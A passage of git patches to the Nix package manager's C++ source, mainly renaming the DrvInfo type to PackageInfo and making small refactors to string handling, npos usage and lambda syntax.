DrvInfo::checkMeta(Value & v) +bool PackageInfo::checkMeta(Value & v) { state->forceValue(v, v.determinePos(noPos)); if (v.type() == nList) { @@ -216,7 +216,7 @@ bool DrvInfo::checkMeta(Value & v) } -Value * DrvInfo::queryMeta(const std::string & name) +Value * PackageInfo::queryMeta(const std::string & name) { if (!getMeta()) return 0; Bindings::iterator a = meta->find(state->symbols.create(name)); @@ -225,7 +225,7 @@ Value * DrvInfo::queryMeta(const std::string & name) } -std::string DrvInfo::queryMetaString(const std::string & name) +std::string PackageInfo::queryMetaString(const std::string & name) { Value * v = queryMeta(name); if (!v || v->type() != nString) return ""; @@ -233,7 +233,7 @@ std::string DrvInfo::queryMetaString(const std::string & name) } -NixInt DrvInfo::queryMetaInt(const std::string & name, NixInt def) +NixInt PackageInfo::queryMetaInt(const std::string & name, NixInt def) { Value * v = queryMeta(name); if (!v) return def; @@ -247,7 +247,7 @@ NixInt DrvInfo::queryMetaInt(const std::string & name, NixInt def) return def; } -NixFloat DrvInfo::queryMetaFloat(const std::string & name, NixFloat def) +NixFloat PackageInfo::queryMetaFloat(const std::string & name, NixFloat def) { Value * v = queryMeta(name); if (!v) return def; @@ -262,7 +262,7 @@ NixFloat DrvInfo::queryMetaFloat(const std::string & name, NixFloat def) } -bool DrvInfo::queryMetaBool(const std::string & name, bool def) +bool PackageInfo::queryMetaBool(const std::string & name, bool def) { Value * v = queryMeta(name); if (!v) return def; @@ -277,7 +277,7 @@ bool DrvInfo::queryMetaBool(const std::string & name, bool def) } -void DrvInfo::setMeta(const std::string & name, Value * v) +void PackageInfo::setMeta(const std::string & name, Value * v) { getMeta(); auto attrs = state->buildBindings(1 + (meta ? meta->size() : 0)); @@ -300,7 +300,7 @@ typedef std::set Done; The result boolean indicates whether it makes sense for the caller to recursively search for derivations in `v'. */ static bool getDerivation(EvalState & state, Value & v, - const std::string & attrPath, DrvInfos & drvs, Done & done, + const std::string & attrPath, PackageInfos & drvs, Done & done, bool ignoreAssertionFailures) { try { @@ -311,7 +311,7 @@ static bool getDerivation(EvalState & state, Value & v, derivation {...}; y = x;}'. */ if (!done.insert(v.attrs).second) return false; - DrvInfo drv(state, attrPath, v.attrs); + PackageInfo drv(state, attrPath, v.attrs); drv.queryName(); @@ -326,11 +326,11 @@ static bool getDerivation(EvalState & state, Value & v, } -std::optional getDerivation(EvalState & state, Value & v, +std::optional getDerivation(EvalState & state, Value & v, bool ignoreAssertionFailures) { Done done; - DrvInfos drvs; + PackageInfos drvs; getDerivation(state, v, "", drvs, done, ignoreAssertionFailures); if (drvs.size() != 1) return {}; return std::move(drvs.front()); @@ -348,7 +348,7 @@ static std::regex attrRegex("[A-Za-z_][A-Za-z0-9-_+]*"); static void getDerivations(EvalState & state, Value & vIn, const std::string & pathPrefix, Bindings & autoArgs, - DrvInfos & drvs, Done & done, + PackageInfos & drvs, Done & done, bool ignoreAssertionFailures) { Value v; @@ -401,7 +401,7 @@ static void getDerivations(EvalState & state, Value & vIn, void getDerivations(EvalState & state, Value & v, const std::string & pathPrefix, - Bindings & autoArgs, DrvInfos & drvs, bool ignoreAssertionFailures) + Bindings & autoArgs, PackageInfos & drvs, bool ignoreAssertionFailures) { Done done; getDerivations(state, v, pathPrefix, autoArgs, drvs, done, ignoreAssertionFailures); diff --git a/src/libexpr/get-drvs.hh b/src/libexpr/get-drvs.hh index 584d64ac1..b886581b6 100644 --- a/src/libexpr/get-drvs.hh +++ b/src/libexpr/get-drvs.hh @@ -11,7 +11,7 @@ namespace nix { -struct DrvInfo +struct PackageInfo { public: typedef std::map> Outputs; @@ -43,9 +43,9 @@ public: */ std::string attrPath; - DrvInfo(EvalState & state) : state(&state) { }; - DrvInfo(EvalState & state, std::string attrPath, Bindings * attrs); - DrvInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs); + PackageInfo(EvalState & state) : state(&state) { }; + PackageInfo(EvalState & state, std::string attrPath, Bindings * attrs); + PackageInfo(EvalState & state, ref store, const std::string & drvPathWithOutputs); std::string queryName() const; std::string querySystem() const; @@ -82,21 +82,21 @@ public: #if HAVE_BOEHMGC -typedef std::list> DrvInfos; +typedef std::list> PackageInfos; #else -typedef std::list DrvInfos; +typedef std::list PackageInfos; #endif /** - * If value `v` denotes a derivation, return a DrvInfo object + * If value `v` denotes a derivation, return a PackageInfo object * describing it. Otherwise return nothing. */ -std::optional getDerivation(EvalState & state, +std::optional getDerivation(EvalState & state, Value & v, bool ignoreAssertionFailures); void getDerivations(EvalState & state, Value & v, const std::string & pathPrefix, - Bindings & autoArgs, DrvInfos & drvs, + Bindings & autoArgs, PackageInfos & drvs, bool ignoreAssertionFailures); diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 1ad4b387c..549adfbf7 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -289,7 +289,7 @@ static void main_nix_build(int argc, char * * argv) if (runEnv) setenv("IN_NIX_SHELL", pure ? "pure" : "impure", 1); - DrvInfos drvs; + PackageInfos drvs; /* Parse the expressions. */ std::vector exprs; @@ -307,7 +307,7 @@ static void main_nix_build(int argc, char * * argv) } catch (Error & e) {}; auto [path, outputNames] = parsePathWithOutputs(absolute); if (evalStore->isStorePath(path) && hasSuffix(path, ".drv")) - drvs.push_back(DrvInfo(*state, evalStore, absolute)); + drvs.push_back(PackageInfo(*state, evalStore, absolute)); else /* If we're in a #! script, interpret filenames relative to the script. */ @@ -383,8 +383,8 @@ static void main_nix_build(int argc, char * * argv) if (drvs.size() != 1) throw UsageError("nix-shell requires a single derivation"); - auto & drvInfo = drvs.front(); - auto drv = evalStore->derivationFromPath(drvInfo.requireDrvPath()); + auto & packageInfo = drvs.front(); + auto drv = evalStore->derivationFromPath(packageInfo.requireDrvPath()); std::vector pathsToBuild; RealisedPath::Set pathsToCopy; @@ -527,7 +527,7 @@ static void main_nix_build(int argc, char * * argv) for (const auto & [inputDrv, inputNode] : drv.inputDrvs.map) accumInputClosure(inputDrv, inputNode); - ParsedDerivation parsedDrv(drvInfo.requireDrvPath(), drv); + ParsedDerivation parsedDrv(packageInfo.requireDrvPath(), drv); if (auto structAttrs = parsedDrv.prepareStructuredAttrs(*store, inputs)) { auto json = structAttrs.value(); @@ -620,10 +620,10 @@ static void main_nix_build(int argc, char * * argv) std::map> drvMap; - for (auto & drvInfo : drvs) { - auto drvPath = drvInfo.requireDrvPath(); + for (auto & packageInfo : drvs) { + auto drvPath = packageInfo.requireDrvPath(); - auto outputName = drvInfo.queryOutputName(); + auto outputName = packageInfo.queryOutputName(); if (outputName == "") throw Error("derivation '%s' lacks an 'outputName' attribute", store->printStorePath(drvPath)); diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index e2bbd9775..d5b46c57a 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -184,7 +184,7 @@ static void loadSourceExpr(EvalState & state, const SourcePath & path, Value & v static void loadDerivations(EvalState & state, const SourcePath & nixExprPath, std::string systemFilter, Bindings & autoArgs, - const std::string & pathPrefix, DrvInfos & elems) + const std::string & pathPrefix, PackageInfos & elems) { Value vRoot; loadSourceExpr(state, nixExprPath, vRoot); @@ -195,7 +195,7 @@ static void loadDerivations(EvalState & state, const SourcePath & nixExprPath, /* Filter out all derivations not applicable to the current system. */ - for (DrvInfos::iterator i = elems.begin(), j; i != elems.end(); i = j) { + for (PackageInfos::iterator i = elems.begin(), j; i != elems.end(); i = j) { j = i; j++; if (systemFilter != "*" && i->querySystem() != systemFilter) elems.erase(i); @@ -203,13 +203,13 @@ static void loadDerivations(EvalState & state, const SourcePath & nixExprPath, } -static long getPriority(EvalState & state, DrvInfo & drv) +static long getPriority(EvalState & state, PackageInfo & drv) { return drv.queryMetaInt("priority", 0); } -static long comparePriorities(EvalState & state, DrvInfo & drv1, DrvInfo & drv2) +static long comparePriorities(EvalState & state, PackageInfo & drv1, PackageInfo & drv2) { return getPriority(state, drv2) - getPriority(state, drv1); } @@ -217,7 +217,7 @@ static long comparePriorities(EvalState & state, DrvInfo & drv1, DrvInfo & drv2) // FIXME: this function is rather slow since it checks a single path // at a time. -static bool isPrebuilt(EvalState & state, DrvInfo & elem) +static bool isPrebuilt(EvalState & state, PackageInfo & elem) { auto path = elem.queryOutPath(); if (state.store->isValidPath(path)) return true; @@ -236,11 +236,11 @@ static void checkSelectorUse(DrvNames & selectors) namespace { -std::set searchByPrefix(const DrvInfos & allElems, std::string_view prefix) { +std::set searchByPrefix(const PackageInfos & allElems, std::string_view prefix) { constexpr std::size_t maxResults = 3; std::set result; - for (const auto & drvInfo : allElems) { - const auto drvName = DrvName { drvInfo.queryName() }; + for (const auto & packageInfo : allElems) { + const auto drvName = DrvName { packageInfo.queryName() }; if (hasPrefix(drvName.name, prefix)) { result.emplace(drvName.name); @@ -254,11 +254,11 @@ std::set searchByPrefix(const DrvInfos & allElems, std::string_view struct Match { - DrvInfo drvInfo; + PackageInfo packageInfo; std::size_t index; - Match(DrvInfo drvInfo_, std::size_t index_) - : drvInfo{std::move(drvInfo_)} + Match(PackageInfo packageInfo_, std::size_t index_) + : packageInfo{std::move(packageInfo_)} , index{index_} {} }; @@ -276,7 +276,7 @@ std::vector pickNewestOnly(EvalState & state, std::vector matches) StringSet multiple; for (auto & match : matches) { - auto & oneDrv = match.drvInfo; + auto & oneDrv = match.packageInfo; const auto drvName = DrvName { oneDrv.queryName() }; long comparison = 1; @@ -284,7 +284,7 @@ std::vector pickNewestOnly(EvalState & state, std::vector matches) const auto itOther = newest.find(drvName.name); if (itOther != newest.end()) { - auto & newestDrv = itOther->second.drvInfo; + auto & newestDrv = itOther->second.packageInfo; comparison = oneDrv.querySystem() == newestDrv.querySystem() ? 0 : @@ -319,23 +319,23 @@ std::vector pickNewestOnly(EvalState & state, std::vector matches) } // end namespace -static DrvInfos filterBySelector(EvalState & state, const DrvInfos & allElems, +static PackageInfos filterBySelector(EvalState & state, const PackageInfos & allElems, const Strings & args, bool newestOnly) { DrvNames selectors = drvNamesFromArgs(args); if (selectors.empty()) selectors.emplace_back("*"); - DrvInfos elems; + PackageInfos elems; std::set done; for (auto & selector : selectors) { std::vector matches; - for (const auto & [index, drvInfo] : enumerate(allElems)) { - const auto drvName = DrvName { drvInfo.queryName() }; + for (const auto & [index, packageInfo] : enumerate(allElems)) { + const auto drvName = DrvName { packageInfo.queryName() }; if (selector.matches(drvName)) { ++selector.hits; - matches.emplace_back(drvInfo, index); + matches.emplace_back(packageInfo, index); } } @@ -347,7 +347,7 @@ static DrvInfos filterBySelector(EvalState & state, const DrvInfos & allElems, haven't inserted before. */ for (auto & match : matches) if (done.insert(match.index).second) - elems.push_back(match.drvInfo); + elems.push_back(match.packageInfo); if (selector.hits == 0 && selector.fullName != "*") { const auto prefixHits = searchByPrefix(allElems, selector.name); @@ -376,7 +376,7 @@ static bool isPath(std::string_view s) static void queryInstSources(EvalState & state, InstallSourceInfo & instSource, const Strings & args, - DrvInfos & elems, bool newestOnly) + PackageInfos & elems, bool newestOnly) { InstallSourceType type = instSource.type; if (type == srcUnknown && args.size() > 0 && isPath(args.front())) @@ -392,7 +392,7 @@ static void queryInstSources(EvalState & state, /* Load the derivations from the (default or specified) Nix expression. */ - DrvInfos allElems; + PackageInfos allElems; loadDerivations(state, *instSource.nixExprPath, instSource.systemFilter, *instSource.autoArgs, "", allElems); @@ -433,7 +433,7 @@ static void queryInstSources(EvalState & state, std::string name(path.name()); - DrvInfo elem(state, "", nullptr); + PackageInfo elem(state, "", nullptr); elem.setName(name); if (path.isDerivation()) { @@ -476,7 +476,7 @@ static void queryInstSources(EvalState & state, } -static void printMissing(EvalState & state, DrvInfos & elems) +static void printMissing(EvalState & state, PackageInfos & elems) { std::vector targets; for (auto & i : elems) @@ -494,7 +494,7 @@ static void printMissing(EvalState & state, DrvInfos & elems) } -static bool keep(DrvInfo & drv) +static bool keep(PackageInfo & drv) { return drv.queryMetaBool("keep", false); } @@ -506,7 +506,7 @@ static void installDerivations(Globals & globals, debug("installing derivations"); /* Get the set of user environment elements to be installed. */ - DrvInfos newElems, newElemsTmp; + PackageInfos newElems, newElemsTmp; queryInstSources(*globals.state, globals.instSource, args, newElemsTmp, true); /* If --prebuilt-only is given, filter out source-only packages. */ @@ -529,12 +529,12 @@ static void installDerivations(Globals & globals, while (true) { auto lockToken = optimisticLockProfile(profile); - DrvInfos allElems(newElems); + PackageInfos allElems(newElems); /* Add in the already installed derivations, unless they have the same name as a to-be-installed element. */ if (!globals.removeAll) { - DrvInfos installedElems = queryInstalled(*globals.state, profile); + PackageInfos installedElems = queryInstalled(*globals.state, profile); for (auto & i : installedElems) { DrvName drvName(i.queryName()); @@ -592,14 +592,14 @@ static void upgradeDerivations(Globals & globals, while (true) { auto lockToken = optimisticLockProfile(globals.profile); - DrvInfos installedElems = queryInstalled(*globals.state, globals.profile); + PackageInfos installedElems = queryInstalled(*globals.state, globals.profile); /* Fetch all derivations from the input file. */ - DrvInfos availElems; + PackageInfos availElems; queryInstSources(*globals.state, globals.instSource, args, availElems, false); /* Go through all installed derivations. */ - DrvInfos newElems; + PackageInfos newElems; for (auto & i : installedElems) { DrvName drvName(i.queryName()); @@ -617,7 +617,7 @@ static void upgradeDerivations(Globals & globals, priority. If there are still multiple matches, take the one with the highest version. Do not upgrade if it would decrease the priority. */ - DrvInfos::iterator bestElem = availElems.end(); + PackageInfos::iterator bestElem = availElems.end(); std::string bestVersion; for (auto j = availElems.begin(); j != availElems.end(); ++j) { if (comparePriorities(*globals.state, i, *j) > 0) @@ -687,7 +687,7 @@ static void opUpgrade(Globals & globals, Strings opFlags, Strings opArgs) } -static void setMetaFlag(EvalState & state, DrvInfo & drv, +static void setMetaFlag(EvalState & state, PackageInfo & drv, const std::string & name, const std::string & value) { auto v = state.allocValue(); @@ -711,7 +711,7 @@ static void opSetFlag(Globals & globals, Strings opFlags, Strings opArgs) while (true) { std::string lockToken = optimisticLockProfile(globals.profile); - DrvInfos installedElems = queryInstalled(*globals.state, globals.profile); + PackageInfos installedElems = queryInstalled(*globals.state, globals.profile); /* Update all matching derivations. */ for (auto & i : installedElems) { @@ -745,13 +745,13 @@ static void opSet(Globals & globals, Strings opFlags, Strings opArgs) else throw UsageError("unknown flag '%1%'", arg); } - DrvInfos elems; + PackageInfos elems; queryInstSources(*globals.state, globals.instSource, opArgs, elems, true); if (elems.size() != 1) throw Error("--set requires exactly one derivation"); - DrvInfo & drv(elems.front()); + PackageInfo & drv(elems.front()); if (globals.forceName != "") drv.setName(globals.forceName); @@ -786,10 +786,10 @@ static void uninstallDerivations(Globals & globals, Strings & selectors, while (true) { auto lockToken = optimisticLockProfile(profile); - DrvInfos workingElems = queryInstalled(*globals.state, profile); + PackageInfos workingElems = queryInstalled(*globals.state, profile); for (auto & selector : selectors) { - DrvInfos::iterator split = workingElems.begin(); + PackageInfos::iterator split = workingElems.begin(); if (isPath(selector)) { StorePath selectorStorePath = globals.state->store->followLinksToStorePath(selector); split = std::partition( @@ -838,7 +838,7 @@ static bool cmpChars(char a, char b) } -static bool cmpElemByName(const DrvInfo & a, const DrvInfo & b) +static bool cmpElemByName(const PackageInfo & a, const PackageInfo & b) { auto a_name = a.queryName(); auto b_name = b.queryName(); @@ -891,7 +891,7 @@ void printTable(Table & table) typedef enum { cvLess, cvEqual, cvGreater, cvUnavail } VersionDiff; static VersionDiff compareVersionAgainstSet( - const DrvInfo & elem, const DrvInfos & elems, std::string & version) + const PackageInfo & elem, const PackageInfos & elems, std::string & version) { DrvName name(elem.queryName()); @@ -922,7 +922,7 @@ static VersionDiff compareVersionAgainstSet( } -static void queryJSON(Globals & globals, std::vector & elems, bool printOutPath, bool printDrvPath, bool printMeta) +static void queryJSON(Globals & globals, std::vector & elems, bool printOutPath, bool printDrvPath, bool printMeta) { using nlohmann::json; json topObj = json::object(); @@ -942,7 +942,7 @@ static void queryJSON(Globals & globals, std::vector & elems, bool prin }; { - DrvInfo::Outputs outputs = i.queryOutputs(printOutPath); + PackageInfo::Outputs outputs = i.queryOutputs(printOutPath); json &outputObj = pkgObj["outputs"]; outputObj = json::object(); for (auto & j : outputs) { @@ -1032,7 +1032,7 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) throw UsageError("--attr-path(-P) only works with --available"); /* Obtain derivation information from the specified source. */ - DrvInfos availElems, installedElems; + PackageInfos availElems, installedElems; if (source == sInstalled || compareVersions || printStatus) installedElems = queryInstalled(*globals.state, globals.profile); @@ -1042,16 +1042,16 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) globals.instSource.systemFilter, *globals.instSource.autoArgs, attrPath, availElems); - DrvInfos elems_ = filterBySelector(*globals.state, + PackageInfos elems_ = filterBySelector(*globals.state, source == sInstalled ? installedElems : availElems, opArgs, false); - DrvInfos & otherElems(source == sInstalled ? availElems : installedElems); + PackageInfos & otherElems(source == sInstalled ? availElems : installedElems); /* Sort them by name. */ /* !!! */ - std::vector elems; + std::vector elems; for (auto & i : elems_) elems.push_back(i); sort(elems.begin(), elems.end(), cmpElemByName); @@ -1192,7 +1192,7 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) attrs["outputName"] = i.queryOutputName(); if (printOutPath && !xmlOutput) { - DrvInfo::Outputs outputs = i.queryOutputs(); + PackageInfo::Outputs outputs = i.queryOutputs(); std::string s; for (auto & j : outputs) { if (!s.empty()) s += ';'; @@ -1212,7 +1212,7 @@ static void opQuery(Globals & globals, Strings opFlags, Strings opArgs) if (xmlOutput) { XMLOpenElement item(xml, "item", attrs); - DrvInfo::Outputs outputs = i.queryOutputs(printOutPath); + PackageInfo::Outputs outputs = i.queryOutputs(printOutPath); for (auto & j : outputs) { XMLAttrs attrs2; attrs2["name"] = j.first; diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 973b6ee2b..2f9c988d5 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -15,9 +15,9 @@ namespace nix { -DrvInfos queryInstalled(EvalState & state, const Path & userEnv) +PackageInfos queryInstalled(EvalState & state, const Path & userEnv) { - DrvInfos elems; + PackageInfos elems; if (pathExists(userEnv + "/manifest.json")) throw Error("profile '%s' is incompatible with 'nix-env'; please use 'nix profile' instead", userEnv); auto manifestFile = userEnv + "/manifest.nix"; @@ -31,7 +31,7 @@ DrvInfos queryInstalled(EvalState & state, const Path & userEnv) } -bool createUserEnv(EvalState & state, DrvInfos & elems, +bool createUserEnv(EvalState & state, PackageInfos & elems, const Path & profile, bool keepDerivations, const std::string & lockToken) { @@ -57,7 +57,7 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, output paths, and optionally the derivation path, as well as the meta attributes. */ std::optional drvPath = keepDerivations ? i.queryDrvPath() : std::nullopt; - DrvInfo::Outputs outputs = i.queryOutputs(true, true); + PackageInfo::Outputs outputs = i.queryOutputs(true, true); StringSet metaNames = i.queryMetaNames(); auto attrs = state.buildBindings(7 + outputs.size()); diff --git a/src/nix-env/user-env.hh b/src/nix-env/user-env.hh index af45d2d85..15da3fcb3 100644 --- a/src/nix-env/user-env.hh +++ b/src/nix-env/user-env.hh @@ -5,9 +5,9 @@ namespace nix { -DrvInfos queryInstalled(EvalState & state, const Path & userEnv); +PackageInfos queryInstalled(EvalState & state, const Path & userEnv); -bool createUserEnv(EvalState & state, DrvInfos & elems, +bool createUserEnv(EvalState & state, PackageInfos & elems, const Path & profile, bool keepDerivations, const std::string & lockToken); diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index 87bc986e8..b9e626aed 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -62,7 +62,7 @@ void processExpr(EvalState & state, const Strings & attrPaths, std::cout << std::endl; } } else { - DrvInfos drvs; + PackageInfos drvs; getDerivations(state, v, "", autoArgs, drvs, false); for (auto & i : drvs) { auto drvPath = i.requireDrvPath(); diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 2b6e56283..bebc62deb 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -395,11 +395,11 @@ struct CmdFlakeCheck : FlakeCommand auto checkDerivation = [&](const std::string & attrPath, Value & v, const PosIdx pos) -> std::optional { try { - auto drvInfo = getDerivation(*state, v, false); - if (!drvInfo) + auto packageInfo = getDerivation(*state, v, false); + if (!packageInfo) throw Error("flake attribute '%s' is not a derivation", attrPath); // FIXME: check meta attributes - return drvInfo->queryDrvPath(); + return packageInfo->queryDrvPath(); } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the derivation '%s'", attrPath)); reportError(e); diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 616fe9512..812e703b4 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -168,11 +168,11 @@ struct ProfileManifest state.allowPath(state.store->followLinksToStore(profile)); state.allowPath(state.store->followLinksToStore(profile + "/manifest.nix")); - auto drvInfos = queryInstalled(state, state.store->followLinksToStore(profile)); + auto packageInfos = queryInstalled(state, state.store->followLinksToStore(profile)); - for (auto & drvInfo : drvInfos) { + for (auto & packageInfo : packageInfos) { ProfileElement element; - element.storePaths = {drvInfo.queryOutPath()}; + element.storePaths = {packageInfo.queryOutPath()}; addElement(std::move(element)); } } From ea6aa5ffd87b27ddd89cab541f4b98b3efcb7ea9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 15:44:02 +0100 Subject: [PATCH 277/654] Package{,Info}: comments --- src/libexpr/get-drvs.hh | 4 +++- src/libstore/builtins/buildenv.hh | 3 +++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/src/libexpr/get-drvs.hh b/src/libexpr/get-drvs.hh index b886581b6..e8c1190f7 100644 --- a/src/libexpr/get-drvs.hh +++ b/src/libexpr/get-drvs.hh @@ -10,7 +10,9 @@ namespace nix { - +/** + * A "parsed" package attribute set. + */ struct PackageInfo { public: diff --git a/src/libstore/builtins/buildenv.hh b/src/libstore/builtins/buildenv.hh index 8bebd390d..b24633e27 100644 --- a/src/libstore/builtins/buildenv.hh +++ b/src/libstore/builtins/buildenv.hh @@ -5,6 +5,9 @@ namespace nix { +/** + * Think of this as a "store level package attrset", but stripped down to no more than the needs of buildenv. + */ struct Package { Path path; bool active; From 0bc66e529fa34b84ae31301dd99f31cc16ccfd6c Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 10:13:55 +0100 Subject: [PATCH 278/654] Use npos member variables instead of full type --- src/libutil/file-system.cc | 6 +++--- src/libutil/util.cc | 10 +++++----- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index ab8d32275..14d496958 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -90,7 +90,7 @@ Path canonPath(PathView path, bool resolveSymlinks) /* Normal component; copy it. */ else { s += '/'; - if (const auto slash = path.find('/'); slash == std::string::npos) { + if (const auto slash = path.find('/'); slash == path.npos) { s += path; path = {}; } else { @@ -123,7 +123,7 @@ Path canonPath(PathView path, bool resolveSymlinks) Path dirOf(const PathView path) { Path::size_type pos = path.rfind('/'); - if (pos == std::string::npos) + if (pos == path.npos) return "."; return pos == 0 ? "/" : Path(path, 0, pos); } @@ -139,7 +139,7 @@ std::string_view baseNameOf(std::string_view path) last -= 1; auto pos = path.rfind('/', last); - if (pos == std::string::npos) + if (pos == path.npos) pos = 0; else pos += 1; diff --git a/src/libutil/util.cc b/src/libutil/util.cc index b23362b5c..6e47ce2a3 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -52,9 +52,9 @@ template C tokenizeString(std::string_view s, std::string_view separato { C result; auto pos = s.find_first_not_of(separators, 0); - while (pos != std::string_view::npos) { + while (pos != s.npos) { auto end = s.find_first_of(separators, pos + 1); - if (end == std::string_view::npos) end = s.size(); + if (end == s.npos) end = s.size(); result.insert(result.end(), std::string(s, pos, end - pos)); pos = s.find_first_not_of(separators, end); } @@ -69,7 +69,7 @@ template std::vector tokenizeString(std::string_view s, std::string std::string chomp(std::string_view s) { size_t i = s.find_last_not_of(" \n\r\t"); - return i == std::string_view::npos ? "" : std::string(s, 0, i + 1); + return i == s.npos ? "" : std::string(s, 0, i + 1); } @@ -89,7 +89,7 @@ std::string replaceStrings( { if (from.empty()) return res; size_t pos = 0; - while ((pos = res.find(from, pos)) != std::string::npos) { + while ((pos = res.find(from, pos)) != res.npos) { res.replace(pos, from.size(), to); pos += to.size(); } @@ -102,7 +102,7 @@ std::string rewriteStrings(std::string s, const StringMap & rewrites) for (auto & i : rewrites) { if (i.first == i.second) continue; size_t j = 0; - while ((j = s.find(i.first, j)) != std::string::npos) + while ((j = s.find(i.first, j)) != s.npos) s.replace(j, i.first.size(), i.second); } return s; From 1885d579db145d45f0aaf6130cd7e4db17b5e214 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:49:22 +0100 Subject: [PATCH 279/654] Improve String Handling --- src/libutil/file-system.cc | 6 +++++- src/libutil/util.cc | 9 ++++----- src/libutil/util.hh | 2 +- 3 files changed, 10 insertions(+), 7 deletions(-) diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index 14d496958..cf8a6d967 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -116,7 +116,11 @@ Path canonPath(PathView path, bool resolveSymlinks) } } - return s.empty() ? "/" : std::move(s); + if (s.empty()) { + s = "/"; + } + + return s; } diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 6e47ce2a3..8f310c6fe 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -122,12 +122,11 @@ bool hasSuffix(std::string_view s, std::string_view suffix) } -std::string toLower(const std::string & s) +std::string toLower(std::string s) { - std::string r(s); - for (auto & c : r) + for (auto & c : s) c = std::tolower(c); - return r; + return s; } @@ -135,7 +134,7 @@ std::string shellEscape(const std::string_view s) { std::string r; r.reserve(s.size() + 2); - r += "'"; + r += '\''; for (auto & i : s) if (i == '\'') r += "'\\''"; else r += i; r += '\''; diff --git a/src/libutil/util.hh b/src/libutil/util.hh index 27faa4d6d..11a0431da 100644 --- a/src/libutil/util.hh +++ b/src/libutil/util.hh @@ -180,7 +180,7 @@ bool hasSuffix(std::string_view s, std::string_view suffix); /** * Convert a string to lower case. */ -std::string toLower(const std::string & s); +std::string toLower(std::string s); /** From c924147c9d782e70e0ad421329252ced57f88d09 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:50:00 +0100 Subject: [PATCH 280/654] Drop parentheses from thunks --- src/libutil/file-descriptor.cc | 2 +- src/libutil/processes.cc | 12 ++++++------ src/libutil/unix-domain-socket.cc | 4 ++-- src/libutil/util.cc | 2 +- 4 files changed, 10 insertions(+), 10 deletions(-) diff --git a/src/libutil/file-descriptor.cc b/src/libutil/file-descriptor.cc index 692be3383..43e3cd979 100644 --- a/src/libutil/file-descriptor.cc +++ b/src/libutil/file-descriptor.cc @@ -96,7 +96,7 @@ void drainFD(int fd, Sink & sink, bool block) throw SysError("making file descriptor non-blocking"); } - Finally finally([&]() { + Finally finally([&] { if (!block) { if (fcntl(fd, F_SETFL, saved) == -1) throw SysError("making file descriptor blocking"); diff --git a/src/libutil/processes.cc b/src/libutil/processes.cc index 91a0ea66f..e1e60302b 100644 --- a/src/libutil/processes.cc +++ b/src/libutil/processes.cc @@ -131,7 +131,7 @@ void killUser(uid_t uid) users to which the current process can send signals. So we fork a process, switch to uid, and send a mass kill. */ - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { if (setuid(uid) == -1) throw SysError("setting uid"); @@ -197,7 +197,7 @@ static int childEntry(void * arg) pid_t startProcess(std::function fun, const ProcessOptions & options) { - std::function wrapper = [&]() { + ChildWrapperFunction wrapper = [&] { if (!options.allowVfork) logger = makeSimpleLogger(); try { @@ -229,7 +229,7 @@ pid_t startProcess(std::function fun, const ProcessOptions & options) PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); if (stack == MAP_FAILED) throw SysError("allocating stack"); - Finally freeStack([&]() { munmap(stack, stackSize); }); + Finally freeStack([&] { munmap(stack, stackSize); }); pid = clone(childEntry, stack + stackSize, options.cloneFlags | SIGCHLD, &wrapper); #else @@ -308,7 +308,7 @@ void runProgram2(const RunOptions & options) } /* Fork. */ - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { if (options.environment) replaceEnv(*options.environment); if (options.standardOut && dup2(out.writeSide.get(), STDOUT_FILENO) == -1) @@ -350,7 +350,7 @@ void runProgram2(const RunOptions & options) std::promise promise; - Finally doJoin([&]() { + Finally doJoin([&] { if (writerThread.joinable()) writerThread.join(); }); @@ -358,7 +358,7 @@ void runProgram2(const RunOptions & options) if (source) { in.readSide.close(); - writerThread = std::thread([&]() { + writerThread = std::thread([&] { try { std::vector buf(8 * 1024); while (true) { diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index 05bbb5ba3..dc19daf9e 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -47,7 +47,7 @@ void bind(int fd, const std::string & path) addr.sun_family = AF_UNIX; if (path.size() + 1 >= sizeof(addr.sun_path)) { - Pid pid = startProcess([&]() { + Pid pid = startProcess([&] { Path dir = dirOf(path); if (chdir(dir.c_str()) == -1) throw SysError("chdir to '%s' failed", dir); @@ -78,7 +78,7 @@ void connect(int fd, const std::string & path) if (path.size() + 1 >= sizeof(addr.sun_path)) { Pipe pipe; pipe.create(); - Pid pid = startProcess([&]() { + Pid pid = 